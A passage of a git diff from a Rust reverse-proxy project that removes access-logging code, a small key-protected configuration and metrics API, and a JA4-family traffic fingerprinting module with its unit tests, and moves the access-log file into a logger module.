std::net::SocketAddr::new(peer_addr.ip().into(), peer_addr.port()); - if let Some(fingerprint) = crate::utils::tls_client_hello::get_fingerprint_with_fallback(&std_addr) { - debug!("TLS fingerprint retrieved from storage - JA4: {}, JA4_unsorted: {}, SNI: {:?}, ALPN: {:?}", - fingerprint.ja4, fingerprint.ja4_unsorted, fingerprint.sni, fingerprint.alpn); - // Store in context for future use in this request - ctx.tls_fingerprint = Some(fingerprint.clone()); - Some(fingerprint) - } else { - debug!("No TLS fingerprint found in storage for peer: {} (this may be normal if ClientHello callback didn't fire or PROXY protocol is used)", std_addr); - None - } - } else { - debug!("No peer address available for TLS fingerprint retrieval"); - None - }; - - // Use HTTP JA4H fingerprint for tls_fingerprint parameter - // The TLS JA4 fingerprint will be passed separately via tls_ja4_unsorted - let tls_fingerprint_for_log = Some(ja4h_fingerprint.clone()); - - // Get TCP fingerprint data (if available) - let tcp_fingerprint_data = if let Some(collector) = crate::utils::tcp_fingerprint::get_global_tcp_fingerprint_collector() { - collector.lookup_fingerprint(peer_addr.ip(), peer_addr.port()) - } else { - None - }; - - // Get server certificate info (if available) - // Try hostname first, then SNI from TLS fingerprint - let server_cert_info_opt = { - let hostname_to_use = ctx.hostname.as_ref() - .or_else(|| tls_fp_for_log.as_ref().and_then(|fp| fp.sni.as_ref())); - - if let Some(hostname) = hostname_to_use { - // Try to get certificate path from certificate store - let cert_path = if let Ok(store) = crate::worker::certificate::get_certificate_store().try_read() { - if let Some(certs) = store.as_ref() { - certs.get_cert_path_for_hostname(hostname) - } else { - None - } - } else { - None - }; - - // If certificate path found, extract certificate info - if let Some(cert_path) = cert_path { - crate::utils::tls::extract_cert_info(&cert_path) - } else { - None - } - } else { - None - } - }; - - // Build upstream info - let upstream_info = ctx.upstream_peer.as_ref().map(|peer| { - crate::access_log::UpstreamInfo { - selected: peer.address.clone(), - method: "round_robin".to_string(), // TODO: Get actual method from config - reason: "healthy".to_string(), // TODO: Get actual reason - } - }); - - // Build performance info - let performance_info = crate::access_log::PerformanceInfo { - request_time_ms: Some(ctx.start_time.elapsed().as_millis() as u64), - upstream_time_ms: ctx.upstream_time.map(|d| d.as_millis() as u64), - }; - - // Build response data - let response_data = crate::access_log::ResponseData { - response_json: serde_json::json!({ - "status": response_code, - "status_text": session.response_written() - .and_then(|resp| resp.status.canonical_reason()) - .unwrap_or("Unknown"), - "content_type": session.response_written() - .and_then(|resp| resp.headers.get("content-type")) - .and_then(|h| h.to_str().ok()), - "content_length": session.response_written() - .and_then(|resp| resp.headers.get("content-length")) - .and_then(|h| h.to_str().ok()) - .and_then(|s| s.parse::().ok()) - .unwrap_or(0), - "body": "" // Response body not captured - }), - blocking_info: None, - waf_result: ctx.waf_result.clone(), - threat_data: ctx.threat_data.clone(), - }; - - // Extract SNI, ALPN, cipher, JA4, and JA4_unsorted from TLS fingerprint if available - // Use the same TLS fingerprint we retrieved above - let (tls_sni, tls_alpn, tls_cipher, tls_ja4, tls_ja4_unsorted) = if let Some(tls_fp) = tls_fp_for_log.as_ref() { - // Validate that JA4 values are not empty - let ja4 = if tls_fp.ja4.is_empty() { - warn!("TLS fingerprint found but JA4 is empty - this should not happen"); - None - } else { - Some(tls_fp.ja4.clone()) - }; - - let ja4_unsorted = if tls_fp.ja4_unsorted.is_empty() { - warn!("TLS fingerprint found but JA4_unsorted is empty - this should not happen"); - None - } else { - Some(tls_fp.ja4_unsorted.clone()) - }; - - debug!( - "TLS fingerprint found for logging - JA4: {:?}, JA4_unsorted: {:?}, SNI: {:?}, ALPN: {:?}, Cipher: {:?}", - ja4, ja4_unsorted, tls_fp.sni, tls_fp.alpn, tls_fp.cipher_suite - ); - - // Use SNI from fingerprint, fallback to hostname from context or Host header - let sni = tls_fp.sni.clone().or_else(|| { - ctx.hostname.clone().or_else(|| { - session.req_header().headers.get("host") - .and_then(|h| h.to_str().ok()) - .map(|h| h.split(':').next().unwrap_or(h).to_string()) - }) - }); - - ( - sni, - tls_fp.alpn.clone(), - tls_fp.cipher_suite.clone(), - ja4, - ja4_unsorted, - ) - } else { - debug!("No TLS fingerprint found for logging - peer: {:?} (JA4/JA4_unsorted will be null)", peer_addr); - // Fallback: try to extract SNI from Host header if available - let sni = ctx.hostname.clone().or_else(|| { - session.req_header().headers.get("host") - .and_then(|h| h.to_str().ok()) - .map(|h| h.split(':').next().unwrap_or(h).to_string()) - }); - (sni, None, None, None, None) - }; - - // Create access log with upstream and performance info - if let Err(e) = crate::access_log::HttpAccessLog::create_from_parts( - &req_parts, - &req_body_bytes, - peer_socket_addr, - local_socket_addr, - tls_fingerprint_for_log.as_ref(), - tcp_fingerprint_data.as_ref(), - server_cert_info_opt.as_ref(), - response_data, - ctx.waf_result.as_ref(), - ctx.threat_data.as_ref(), - upstream_info, - Some(performance_info), - tls_sni, - tls_alpn, - tls_cipher, - tls_ja4, - tls_ja4_unsorted, - ).await { - warn!("Failed to create access log: {}", e); - } - } - } -} - -impl LB {} - -fn return_header_host(session: &Session) -> Option { - if session.is_http2() { - match session.req_header().uri.host() { - Some(host) => Option::from(host.to_string()), - None => None, - } - } else { - match session.req_header().headers.get("host") { - Some(host) => { - let header_host = host.to_str().unwrap().splitn(2, ':').collect::>(); - Option::from(header_host[0].to_string()) - } - None => None, - } - } -} diff --git a/src/http_proxy/webserver.rs b/src/http_proxy/webserver.rs deleted file mode 100644 index a9976de..0000000 --- a/src/http_proxy/webserver.rs +++ /dev/null @@ -1,113 +0,0 @@ -use crate::utils::discovery::APIUpstreamProvider; -use crate::utils::structs::Configuration; -use axum::body::Body; -use axum::extract::{Query, State}; -use axum::http::{Response, StatusCode}; -use axum::response::IntoResponse; -use axum::routing::{get, post}; -use axum::Router; -use axum_server::tls_openssl::OpenSSLConfig; -use futures::channel::mpsc::Sender; -use futures::SinkExt; -use log::info; -use prometheus::{gather, Encoder, TextEncoder}; -use std::collections::HashMap; -use std::net::SocketAddr; -use tokio::net::TcpListener; -use tower_http::services::ServeDir; - -#[derive(Clone)] -struct AppState { - master_key: String, - config_sender: Sender, - config_api_enabled: bool, -} - -#[allow(unused_mut)] -pub async fn run_server(config: &APIUpstreamProvider, mut to_return: Sender) { - let app_state = AppState { - master_key: config.masterkey.clone(), - config_sender: to_return.clone(), - config_api_enabled: config.config_api_enabled.clone(), - }; - - let app = Router::new() - // .route("/{*wildcard}", get(senderror)) - // .route("/{*wildcard}", post(senderror)) - // .route("/{*wildcard}", put(senderror)) - // .route("/{*wildcard}", head(senderror)) - // .route("/{*wildcard}", delete(senderror)) - // .nest_service("/static", static_files) - .route("/conf", post(conf)) - .route("/metrics", get(metrics)) - .with_state(app_state); - - if let Some(value) = &config.tls_address { - let cf = OpenSSLConfig::from_pem_file(config.tls_certificate.clone().unwrap(), config.tls_key_file.clone().unwrap()).unwrap(); - let addr: SocketAddr = value.parse().expect("Unable to parse socket address"); - let tls_app = app.clone(); - tokio::spawn(async move { - if let Err(e) = axum_server::bind_openssl(addr, cf).serve(tls_app.into_make_service()).await { - eprintln!("TLS server failed: {}", e); - } - }); - info!("Starting the TLS API server on: {}", value); - } - - if let (Some(address), Some(folder)) = (&config.file_server_address, &config.file_server_folder) { - let static_files = ServeDir::new(folder); - let static_serve: Router = Router::new().fallback_service(static_files); - let static_listen = TcpListener::bind(address).await.unwrap(); - let _ = tokio::spawn(async move { axum::serve(static_listen, static_serve).await.unwrap() }); - } - - let listener = TcpListener::bind(config.address.clone()).await.unwrap(); - info!("Starting the API server on: {}", config.address); - axum::serve(listener, app).await.unwrap(); -} - -async fn conf(State(mut st): State, Query(params): Query>, content: String) -> impl IntoResponse { - if !st.config_api_enabled { - return Response::builder() - .status(StatusCode::FORBIDDEN) - .body(Body::from("Config remote API is disabled !\n")) - .unwrap(); - } - - if let Some(s) = params.get("key") { - if s.to_owned() == st.master_key { - if let Some(serverlist) = crate::utils::parceyaml::load_configuration(content.as_str(), "content").await { - st.config_sender.send(serverlist).await.unwrap(); - return Response::builder().status(StatusCode::OK).body(Body::from("Config, conf file, updated !\n")).unwrap(); - } else { - return Response::builder().status(StatusCode::BAD_GATEWAY).body(Body::from("Failed to parse config!\n")).unwrap(); - }; - } - } - Response::builder().status(StatusCode::FORBIDDEN).body(Body::from("Access Denied !\n")).unwrap() -} - -async fn metrics() -> impl IntoResponse { - let metric_families = gather(); - let encoder = TextEncoder::new(); - - let mut buffer = Vec::new(); - if let Err(e) = encoder.encode(&metric_families, &mut buffer) { - // encoding error fallback - return Response::builder() - .status(StatusCode::INTERNAL_SERVER_ERROR) - .body(Body::from(format!("Failed to encode metrics: {}", e))) - .unwrap(); - } - - Response::builder() - .status(StatusCode::OK) - .header("Content-Type", encoder.format_type()) - .body(Body::from(buffer)) - .unwrap() -} - -// #[allow(dead_code)] -// async fn senderror() -> impl IntoResponse { -// Response::builder().status(StatusCode::BAD_GATEWAY).body(Body::from("No live upstream found!\n")).unwrap() -// } diff --git a/src/ja4_plus.rs b/src/ja4_plus.rs deleted file mode 100644 index 6c1f241..0000000 --- a/src/ja4_plus.rs +++ /dev/null @@ -1,723 +0,0 @@ -use sha2::{Digest, Sha256}; -use hyper::HeaderMap; - -/// JA4T: TCP Fingerprint from TCP options -/// Official Format: {window_size}_{tcp_options}_{mss}_{window_scale} -/// Example: "65535_2-4-8-1-3_1460_7" -/// Reference: https://github.com/FoxIO-LLC/ja4/blob/main/zeek/ja4t/main.zeek -#[derive(Debug, Clone)] -pub struct Ja4tFingerprint { - pub fingerprint: String, - pub window_size: u16, - pub ttl: u16, - pub mss: u16, - pub window_scale: u8, - pub options: Vec, -} - -impl Ja4tFingerprint { - /// Generate JA4T fingerprint from TCP parameters - /// TCP options are represented by their kind numbers: - /// 0 = EOL, 1 = NOP, 2 = MSS, 3 = Window Scale, 4 = SACK Permitted, - /// 5 = SACK, 8 = Timestamps, etc. - pub fn from_tcp_data( - window_size: u16, - ttl: u16, - mss: u16, - window_scale: u8, - options: &[u8], - ) -> Self { - // Extract TCP option kinds - let mut option_kinds = Vec::new(); - let mut i = 0; - - while i < options.len() { - let kind = options[i]; - - match kind { - 0 => break, // EOL - 1 => { - // NOP - single byte - option_kinds.push(kind); - i += 1; - } - _ => { - // Options with length - if i + 1 < options.len() { - let len = options[i + 1] as usize; - option_kinds.push(kind); - i += len.max(2); - } else { - break; - } - } - } - } - - // Build fingerprint: window_size_options_mss_window_scale - // Official format from Zeek implementation - let options_str = option_kinds - .iter() - .map(|k| k.to_string()) - .collect::>() - .join("-"); - - let fingerprint = format!("{}_{}_{}_{}", - window_size, - if options_str.is_empty() { "0" } else { &options_str }, - mss, - window_scale - ); - - Self { - fingerprint, - window_size, - ttl, - mss, - window_scale, - options: option_kinds, - } - } - - /// Get the JA4T hash (first 12 characters of SHA-256) - pub fn hash(&self) -> String { - let digest = Sha256::digest(self.fingerprint.as_bytes()); - let hex = format!("{:x}", digest); - hex[..12].to_string() - } -} - -/// JA4H: HTTP Header Fingerprint -/// Official Format: {method}{version}{cookie}{referer}{header_count}{language}_{headers_hash}_{cookie_names_hash}_{cookie_values_hash} -/// Example: "ge11cr15enus_a1b2c3d4e5f6_123456789abc_def012345678" -/// Reference: https://github.com/FoxIO-LLC/ja4/blob/main/zeek/ja4h/main.zeek -#[derive(Debug, Clone)] -pub struct Ja4hFingerprint { - pub fingerprint: String, - pub method: String, - pub version: String, - pub has_cookie: bool, - pub has_referer: bool, - pub header_count: usize, - pub language: String, -} - -impl Ja4hFingerprint { - /// Generate JA4H fingerprint from HTTP request - pub fn from_http_request( - method: &str, - version: &str, - headers: &HeaderMap, - ) -> Self { - // Method: first 2 letters, lowercase (ge=GET, po=POST, etc.) - let method_str = method.to_lowercase(); - let method_code = if method_str.len() >= 2 { - &method_str[..2] - } else { - "un" // unknown - }; - - // Version: 10, 11, 20, 30 - let version_code = match version { - "HTTP/0.9" => "09", - "HTTP/1.0" => "10", - "HTTP/1.1" => "11", - "HTTP/2.0" | "HTTP/2" => "20", - "HTTP/3.0" | "HTTP/3" => "30", - _ => "00", - }; - - // Check if Cookie and Referer headers exist - let has_cookie = headers.contains_key("cookie"); - let cookie_flag = if has_cookie { "c" } else { "n" }; - - let has_referer = headers.contains_key("referer"); - let referer_flag = if has_referer { "r" } else { "n" }; - - // Extract language from Accept-Language header - let language = if let Some(lang_header) = headers.get("accept-language") { - if let Ok(lang_str) = lang_header.to_str() { - // Take first language, remove hyphens, lowercase, pad to 4 chars - let primary_lang = lang_str.split(',').next().unwrap_or(""); - let clean_lang = primary_lang - .split(';') - .next() - .unwrap_or("") - .replace('-', "") - .to_lowercase(); - - let mut lang_code = clean_lang.chars().take(4).collect::(); - while lang_code.len() < 4 { - lang_code.push('0'); - } - lang_code - } else { - "0000".to_string() - } - } else { - "0000".to_string() - }; - - // Collect header names (excluding Cookie and Referer) - let mut header_names: Vec = headers - .iter() - .filter_map(|(name, _)| { - let name_str = name.as_str().to_lowercase(); - if name_str == "cookie" || name_str == "referer" { - None - } else { - Some(name_str) - } - }) - .collect(); - - header_names.sort(); - let header_count = header_names.len().min(99); - let header_count_str = format!("{:02}", header_count); - - // Create header hash - let header_string = header_names.join(","); - let header_hash = if header_string.is_empty() { - "000000000000".to_string() - } else { - let digest = Sha256::digest(header_string.as_bytes()); - let hex = format!("{:x}", digest); - hex[..12].to_string() - }; - - // Parse cookies if they exist - let (cookie_names_hash, cookie_values_hash) = if let Some(cookie_value) = headers.get("cookie") { - if let Ok(cookie_str) = cookie_value.to_str() { - // Parse cookie pairs: name=value; name2=value2 - let mut cookie_names: Vec = Vec::new(); - let mut cookie_values: Vec = Vec::new(); - - for part in cookie_str.split(';') { - let trimmed = part.trim(); - if let Some((name, _value)) = trimmed.split_once('=') { - cookie_names.push(name.trim().to_string()); - cookie_values.push(trimmed.to_string()); // Full "name=value" - } - } - - // Sort separately - cookie_names.sort(); - cookie_values.sort(); - - // Hash separately - let names_hash = if cookie_names.is_empty() { - "000000000000".to_string() - } else { - let digest = Sha256::digest(cookie_names.join(",").as_bytes()); - let hex = format!("{:x}", digest); - hex[..12].to_string() - }; - - let values_hash = if cookie_values.is_empty() { - "000000000000".to_string() - } else { - let digest = Sha256::digest(cookie_values.join(",").as_bytes()); - let hex = format!("{:x}", digest); - hex[..12].to_string() - }; - - (names_hash, values_hash) - } else { - ("000000000000".to_string(), "000000000000".to_string()) - } - } else { - ("000000000000".to_string(), "000000000000".to_string()) - }; - - // Build fingerprint: {method}{version}{cookie}{referer}{count}{lang}_{headers}_{cookie_names}_{cookie_values} - let fingerprint = format!( - "{}{}{}{}{}{}_{}_{}_{}", - method_code, - version_code, - cookie_flag, - referer_flag, - header_count_str, - language, - header_hash, - cookie_names_hash, - cookie_values_hash - ); - - Self { - fingerprint, - method: method.to_string(), - version: version.to_string(), - has_cookie, - has_referer, - header_count, - language, - } - } -} - -/// JA4L: Latency Fingerprint -/// Official Format: {rtt_microseconds}_{ttl} -/// Measures round-trip time between SYN and SYNACK packets -/// Example: "12500_64" (12.5ms RTT, TTL 64) -/// Reference: https://github.com/FoxIO-LLC/ja4/blob/main/zeek/ja4l/main.zeek -#[derive(Debug, Clone)] -pub struct Ja4lMeasurement { - pub syn_time: Option, // Microseconds - pub synack_time: Option, // Microseconds - pub ack_time: Option, // Microseconds - pub ttl_client: Option, - pub ttl_server: Option, -} - -impl Ja4lMeasurement { - pub fn new() -> Self { - Self { - syn_time: None, - synack_time: None, - ack_time: None, - ttl_client: None, - ttl_server: None, - } - } - - /// Record SYN packet timestamp - pub fn set_syn(&mut self, timestamp_us: u64, ttl: u8) { - self.syn_time = Some(timestamp_us); - self.ttl_client = Some(ttl); - } - - /// Record SYNACK packet timestamp - pub fn set_synack(&mut self, timestamp_us: u64, ttl: u8) { - self.synack_time = Some(timestamp_us); - self.ttl_server = Some(ttl); - } - - /// Record ACK packet timestamp - pub fn set_ack(&mut self, timestamp_us: u64) { - self.ack_time = Some(timestamp_us); - } - - /// Generate JA4L client fingerprint - /// Format: {client_rtt_us}_{client_ttl} - /// RTT = (ACK - SYNACK) / 2 - pub fn fingerprint_client(&self) -> Option { - let synack = self.synack_time?; - let ack = self.ack_time?; - let ttl = self.ttl_client?; - - // Calculate client-side RTT (half of ACK-SYNACK time) - let rtt_us = (ack.saturating_sub(synack)) / 2; - - Some(format!("{}_{}", rtt_us, ttl)) - } - - /// Generate JA4L server fingerprint - /// Format: {server_rtt_us}_{server_ttl} - /// RTT = (SYNACK - SYN) / 2 - pub fn fingerprint_server(&self) -> Option { - let syn = self.syn_time?; - let synack = self.synack_time?; - let ttl = self.ttl_server?; - - // Calculate server-side RTT (half of SYNACK-SYN time) - let rtt_us = (synack.saturating_sub(syn)) / 2; - - Some(format!("{}_{}", rtt_us, ttl)) - } - - /// Legacy format for compatibility (if needed) - /// Returns both client and server measurements - pub fn fingerprint_combined(&self) -> Option { - let client = self.fingerprint_client()?; - let server = self.fingerprint_server()?; - - Some(format!("c:{},s:{}", client, server)) - } -} - -impl Default for Ja4lMeasurement { - fn default() -> Self { - Self::new() - } -} - -/// JA4S: TLS Server Response Fingerprint -/// Official Format: {proto}{version}{ext_count}{alpn}_{cipher}_{extensions_hash} -/// Example: "t130200_1301_a56c5b993250" -/// Reference: https://github.com/FoxIO-LLC/ja4/blob/main/zeek/ja4s/main.zeek -#[derive(Debug, Clone)] -pub struct Ja4sFingerprint { - pub fingerprint: String, - pub proto: String, - pub version: String, - pub cipher: u16, - pub extensions: Vec, - pub alpn: Option, -} - -impl Ja4sFingerprint { - /// Generate JA4S fingerprint from TLS ServerHello - /// - /// # Arguments - /// * `is_quic` - true if QUIC, false if TCP TLS - /// * `version` - TLS version (0x0304 for TLS 1.3, etc.) - /// * `cipher` - Cipher suite selected by server - /// * `extensions` - List of extension codes from ServerHello - /// * `alpn` - ALPN protocol selected (e.g., "h2", "http/1.1") - pub fn from_server_hello( - is_quic: bool, - version: u16, - cipher: u16, - extensions: &[u16], - alpn: Option<&str>, - ) -> Self { - // Proto: q=QUIC, t=TCP - let proto = if is_quic { "q" } else { "t" }; - - // Version mapping - let version_str = match version { - 0x0304 => "13", // TLS 1.3 - 0x0303 => "12", // TLS 1.2 - 0x0302 => "11", // TLS 1.1 - 0x0301 => "10", // TLS 1.0 - 0x0300 => "s3", // SSL 3.0 - 0x0002 => "s2", // SSL 2.0 - 0xfeff => "d1", // DTLS 1.0 - 0xfefd => "d2", // DTLS 1.2 - 0xfefc => "d3", // DTLS 1.3 - _ => "00", - }; - - // Extension count (max 99) - let ext_count = format!("{:02}", extensions.len().min(99)); - - // ALPN: first and last character - let alpn_code = if let Some(alpn_str) = alpn { - if alpn_str.is_empty() { - "00".to_string() - } else if alpn_str.len() == 1 { - let ch = alpn_str.chars().next().unwrap(); - format!("{}{}", ch, ch) - } else { - let first = alpn_str.chars().next().unwrap(); - let last = alpn_str.chars().last().unwrap(); - format!("{}{}", first, last) - } - } else { - "00".to_string() - }; - - // Build part A - let part_a = format!("{}{}{}{}", proto, version_str, ext_count, alpn_code); - - // Build part B (cipher in hex) - let part_b = format!("{:04x}", cipher); - - // Build part C (extensions hash) - let ext_strings: Vec = extensions.iter().map(|e| format!("{:04x}", e)).collect(); - let ext_string = ext_strings.join(","); - let part_c = if ext_string.is_empty() { - "000000000000".to_string() - } else { - let digest = Sha256::digest(ext_string.as_bytes()); - let hex = format!("{:x}", digest); - hex[..12].to_string() - }; - - let fingerprint = format!("{}_{}_{}",part_a, part_b, part_c); - - Self { - fingerprint, - proto: proto.to_string(), - version: version_str.to_string(), - cipher, - extensions: extensions.to_vec(), - alpn: alpn.map(|s| s.to_string()), - } - } - - /// Get raw (non-hashed) fingerprint - pub fn raw(&self) -> String { - let proto = &self.proto; - let version = &self.version; - let ext_count = format!("{:02}", self.extensions.len().min(99)); - let alpn_code = self.alpn.as_ref().map_or("00".to_string(), |a| { - if a.is_empty() { - "00".to_string() - } else if a.len() == 1 { - format!("{}{}", a, a) - } else { - format!("{}{}", a.chars().next().unwrap(), a.chars().last().unwrap()) - } - }); - - let part_a = format!("{}{}{}{}", proto, version, ext_count, alpn_code); - let part_b = format!("{:04x}", self.cipher); - let ext_strings: Vec = self.extensions.iter().map(|e| format!("{:04x}", e)).collect(); - let part_c = ext_strings.join(","); - - format!("{}_{}_{}", part_a, part_b, part_c) - } -} - -/// JA4X: X.509 Certificate Fingerprint -/// Official Format: {issuer_rdns_hash}_{subject_rdns_hash}_{extensions_hash} -/// Example: "aae71e8db6d7_b186095e22b6_c1a4f9e7d8b3" -/// Reference: https://github.com/FoxIO-LLC/ja4/blob/main/rust/ja4x/src/lib.rs -#[derive(Debug, Clone)] -pub struct Ja4xFingerprint { - pub fingerprint: String, - pub issuer_rdns: String, - pub subject_rdns: String, - pub extensions: String, -} - -impl Ja4xFingerprint { - /// Generate JA4X fingerprint from X.509 certificate attributes - /// - /// # Arguments - /// * `issuer_oids` - List of issuer RDN OIDs in hex (e.g., ["550406", "55040a"]) - /// * `subject_oids` - List of subject RDN OIDs in hex - /// * `extension_oids` - List of extension OIDs in hex - pub fn from_x509( - issuer_oids: &[String], - subject_oids: &[String], - extension_oids: &[String], - ) -> Self { - let issuer_rdns = issuer_oids.join(","); - let subject_rdns = subject_oids.join(","); - let extensions = extension_oids.join(","); - - let issuer_hash = if issuer_rdns.is_empty() { - "000000000000".to_string() - } else { - let digest = Sha256::digest(issuer_rdns.as_bytes()); - let hex = format!("{:x}", digest); - hex[..12].to_string() - }; - - let subject_hash = if subject_rdns.is_empty() { - "000000000000".to_string() - } else { - let digest = Sha256::digest(subject_rdns.as_bytes()); - let hex = format!("{:x}", digest); - hex[..12].to_string() - }; - - let extensions_hash = if extensions.is_empty() { - "000000000000".to_string() - } else { - let digest = Sha256::digest(extensions.as_bytes()); - let hex = format!("{:x}", digest); - hex[..12].to_string() - }; - - let fingerprint = format!("{}_{}_{}", issuer_hash, subject_hash, extensions_hash); - - Self { - fingerprint, - issuer_rdns, - subject_rdns, - extensions, - } - } - - /// Get raw (non-hashed) fingerprint - pub fn raw(&self) -> String { - format!("{}_{}_{}", self.issuer_rdns, self.subject_rdns, self.extensions) - } - - /// Helper to convert OID string to hex representation - /// Example: "2.5.4.3" -> "550403" - pub fn oid_to_hex(oid: &str) -> String { - let parts: Vec = oid.split('.').filter_map(|s| s.parse().ok()).collect(); - if parts.len() < 2 { - return String::new(); - } - - let mut result: Vec = vec![(parts[0] * 40 + parts[1]) as u8]; - - for &part in &parts[2..] { - let encoded = Self::encode_variable_length(part); - result.extend(encoded); - } - - result.iter().map(|b| format!("{:02x}", b)).collect::() - } - - /// Encode value as variable-length quantity (for OID encoding) - fn encode_variable_length(mut value: u32) -> Vec { - let mut output = Vec::new(); - let mut mask = 0x00; - - while value >= 0x80 { - output.insert(0, ((value & 0x7F) | mask) as u8); - value >>= 7; - mask = 0x80; - } - output.insert(0, (value | mask) as u8); - output - } -} - -#[cfg(test)] -mod tests { - use super::*; - use hyper::HeaderMap; - - #[test] - fn test_ja4t_fingerprint() { - let ja4t = Ja4tFingerprint::from_tcp_data( - 65535, // window_size - 64, // ttl - 1460, // mss - 7, // window_scale - &[2, 4, 5, 180, 4, 2, 8, 10], // TCP options (MSS, SACK, Timestamps) - ); - - assert_eq!(ja4t.window_size, 65535); - assert_eq!(ja4t.ttl, 64); - assert_eq!(ja4t.mss, 1460); - assert_eq!(ja4t.window_scale, 7); - // Official format: {window_size}_{options}_{mss}_{window_scale} - assert!(ja4t.fingerprint.starts_with("65535_")); - assert!(ja4t.fingerprint.contains("_1460_7")); - assert!(!ja4t.hash().is_empty()); - assert_eq!(ja4t.hash().len(), 12); - } - - #[test] - fn test_ja4h_fingerprint() { - let mut headers = HeaderMap::new(); - headers.insert("user-agent", "Mozilla/5.0".parse().unwrap()); - headers.insert("accept", "*/*".parse().unwrap()); - headers.insert("accept-language", "en-US,en;q=0.9".parse().unwrap()); - headers.insert("cookie", "session=abc123; id=xyz789".parse().unwrap()); - headers.insert("referer", "https://example.com".parse().unwrap()); - - let ja4h = Ja4hFingerprint::from_http_request( - "GET", - "HTTP/1.1", - &headers, - ); - - assert_eq!(ja4h.method, "GET"); - assert_eq!(ja4h.version, "HTTP/1.1"); - assert!(ja4h.has_cookie); - assert!(ja4h.has_referer); - assert_eq!(ja4h.language, "enus"); - // Official format: {method}{version}{cookie}{referer}{count}{lang}_{headers}_{cookie_names}_{cookie_values} - assert!(ja4h.fingerprint.starts_with("ge11cr")); - assert!(ja4h.fingerprint.contains("enus_")); - // Should have 4 parts separated by underscores - assert_eq!(ja4h.fingerprint.matches('_').count(), 3); - } - - #[test] - fn test_ja4l_measurement() { - let mut ja4l = Ja4lMeasurement::new(); - - // Simulate TCP handshake timing (in microseconds) - ja4l.set_syn(1000000, 64); // SYN at 1s, TTL 64 - ja4l.set_synack(1025000, 128); // SYNACK at 1.025s, TTL 128 (25ms later) - ja4l.set_ack(1050000); // ACK at 1.050s (25ms after SYNACK) - - // Client fingerprint: (ACK - SYNACK) / 2 = (1050000 - 1025000) / 2 = 12500μs - let client_fp = ja4l.fingerprint_client().unwrap(); - assert_eq!(client_fp, "12500_64"); - - // Server fingerprint: (SYNACK - SYN) / 2 = (1025000 - 1000000) / 2 = 12500μs - let server_fp = ja4l.fingerprint_server().unwrap(); - assert_eq!(server_fp, "12500_128"); - } - - #[test] - fn test_ja4s_fingerprint() { - // TLS 1.3 ServerHello with extensions - let ja4s = Ja4sFingerprint::from_server_hello( - false, // TCP (not QUIC) - 0x0304, // TLS 1.3 - 0x1301, // TLS_AES_128_GCM_SHA256 - &[0x002b, 0x0033], // supported_versions, key_share - Some("h2"), // ALPN - ); - - assert_eq!(ja4s.proto, "t"); - assert_eq!(ja4s.version, "13"); - assert_eq!(ja4s.cipher, 0x1301); - assert!(ja4s.fingerprint.starts_with("t1302h2_1301_")); - assert_eq!(ja4s.fingerprint.matches('_').count(), 2); - - // Verify raw format - let raw = ja4s.raw(); - assert!(raw.starts_with("t1302h2_1301_")); - assert!(raw.contains("002b,0033") || raw.contains("002b") && raw.contains("0033")); - } - - #[test] - fn test_ja4s_quic() { - // QUIC ServerHello - let ja4s = Ja4sFingerprint::from_server_hello( - true, // QUIC - 0x0304, // TLS 1.3 - 0x1302, // TLS_AES_256_GCM_SHA384 - &[0x002b], // supported_versions - Some("h3"), // HTTP/3 - ); - - assert_eq!(ja4s.proto, "q"); - assert!(ja4s.fingerprint.starts_with("q1301h3_1302_")); - } - - #[test] - fn test_ja4x_fingerprint() { - // X.509 certificate with common OIDs - let issuer_oids = vec![ - "550406".to_string(), // countryName - "55040a".to_string(), // organizationName - "550403".to_string(), // commonName - ]; - - let subject_oids = vec![ - "550406".to_string(), // countryName - "550403".to_string(), // commonName - ]; - - let extensions = vec![ - "551d0f".to_string(), // keyUsage - "551d25".to_string(), // extKeyUsage - "551d11".to_string(), // subjectAltName - ]; - - let ja4x = Ja4xFingerprint::from_x509(&issuer_oids, &subject_oids, &extensions); - - // Should have 3 parts separated by underscores - assert_eq!(ja4x.fingerprint.matches('_').count(), 2); - - // Each hash should be 12 characters - let parts: Vec<&str> = ja4x.fingerprint.split('_').collect(); - assert_eq!(parts.len(), 3); - assert_eq!(parts[0].len(), 12); - assert_eq!(parts[1].len(), 12); - assert_eq!(parts[2].len(), 12); - - // Verify raw format - let raw = ja4x.raw(); - assert!(raw.contains("550406,55040a,550403")); - assert!(raw.contains("551d0f,551d25,551d11")); - } - - #[test] - fn test_ja4x_oid_conversion() { - // Test OID to hex conversion - assert_eq!(Ja4xFingerprint::oid_to_hex("2.5.4.3"), "550403"); - assert_eq!(Ja4xFingerprint::oid_to_hex("2.5.4.6"), "550406"); - assert_eq!(Ja4xFingerprint::oid_to_hex("2.5.4.10"), "55040a"); - assert_eq!(Ja4xFingerprint::oid_to_hex("2.5.29.15"), "551d0f"); - - // Invalid OID - assert_eq!(Ja4xFingerprint::oid_to_hex("2"), ""); - assert_eq!(Ja4xFingerprint::oid_to_hex(""), ""); - } -} - diff --git a/src/access_log.rs b/src/logger/access_log.rs similarity index 72% rename from src/access_log.rs rename to src/logger/access_log.rs index b632a08..e43f8f7 100644 --- a/src/access_log.rs +++ b/src/logger/access_log.rs @@ -3,14 +3,14 @@ use std::net::SocketAddr; use std::time::{SystemTime, UNIX_EPOCH}; use chrono::{DateTime, Utc}; -use hyper::{Response, header::HeaderValue}; use http_body_util::{BodyExt, Full}; +use hyper::{Response, header::HeaderValue}; use serde::{Deserialize, Serialize}; use sha2::{Digest, Sha256}; -use crate::ja4_plus::{Ja4hFingerprint, Ja4tFingerprint}; -use crate::utils::tcp_fingerprint::TcpFingerprintData; -use crate::worker::log::{get_log_sender_config, send_event, UnifiedEvent}; +use crate::utils::fingerprint::ja4_plus::{Ja4hFingerprint, Ja4tFingerprint}; +use crate::utils::fingerprint::tcp_fingerprint::TcpFingerprintData; +use crate::worker::log::{UnifiedEvent, get_log_sender_config, send_event}; // Re-export for compatibility pub use crate::worker::log::LogSenderConfig; @@ -20,8 +20,8 @@ pub use crate::worker::log::LogSenderConfig; pub struct ServerCertInfo { pub issuer: String, pub subject: String, - pub not_before: String, // RFC3339 format - pub not_after: String, // RFC3339 format + pub not_before: String, // RFC3339 format + pub not_after: String, // RFC3339 format pub fingerprint_sha256: String, } @@ -64,6 +64,7 @@ pub struct ServerCertInfo { #[derive(Debug, Clone, Serialize, Deserialize)] pub struct AccessLogSummary { pub request_id: String, + #[serde(with = "timestamp_format")] pub timestamp: DateTime, pub upstream: Option, pub waf: Option, @@ -207,13 +208,16 @@ impl AccessLogSummary { pub struct HttpAccessLog { pub event_type: String, pub schema_version: String, + #[serde(with = "timestamp_format")] pub timestamp: DateTime, pub request_id: String, - pub http: 